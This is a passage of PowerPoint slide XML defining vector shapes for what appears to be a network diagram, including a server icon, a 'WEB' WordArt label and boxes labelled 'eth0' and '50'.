                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59FB003-6059-D685-BCF9-15683DAD6374}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{806051A9-54A8-4D4D-10E7-DDCC7AEE9C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5525825" y="1967277"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B12EF755-B5A2-162C-7805-ADD2527B1064}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EEBDF3-03AC-F505-144D-BE0133821CC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Gruppo 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{559C95C7-D3BB-A84D-C273-DA234561834F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2150227" y="4015813"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76CED85-DA9D-0821-B16F-87DA8F3B03F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1719186D-7E7D-A582-D1BD-9CCC4C0B6CCE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
